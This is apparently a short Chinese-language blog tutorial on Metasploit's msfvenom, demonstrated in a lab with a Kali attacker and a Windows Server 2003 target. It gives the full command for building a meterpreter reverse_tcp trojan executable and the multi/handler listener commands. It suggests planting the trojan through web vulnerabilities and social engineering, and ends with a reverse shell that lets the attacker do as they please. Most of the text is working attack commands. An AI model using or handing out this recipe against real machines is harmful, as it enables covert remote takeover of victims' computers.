msfvenom的简单使用
前言:
下面简单的演示一下msfvenom的简单使用,
攻击者:kali Linux ip:172.30.23.44
靶机:Windows_server-2003
思路:利用msfvenom制作 .exe 文件,然后发送到靶机Windows上面,运行后就可以在kali linux 上面利用msfconsole连接msfvenom服务控制靶机
0x01.利用msfvenom生成木马文件
1.在kali终端输入下面命令查看可用payload
msfvenom -lp

这里我们使用下面红色方框中的payload

下面是使用msfvenom的部分参数,是比较常用的
-p 选择一个payload
-l 载荷列表
-f 生成的文件格式
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
-x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。
-h 帮助
2.生成木马文件的命令是“msfvenom -p windows/meterpreter/reverse_tcp LHOST=[kali_linux本机IPv4地址] LPORT=80 -f exe -o trojanhorse.exe”,命令中,-p参数是使用指定payload模块,-f 指定格式,-o指定输出路径。

木马已经生成在了kali主目录下
0x02.利用web漏洞和社会工程学等手段让木马程序在受害机运行,这里不详说
0x03.利用msfconsole监听
依次输入下面命令,设置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.30.23.44
set lport 80
exploit

上图监听开始了,等待目标运行木马程序,我直接在靶机点击运行

0x03.当靶机运行木马程序,会反弹一个shell到我的kali,接下来就可以为所欲为
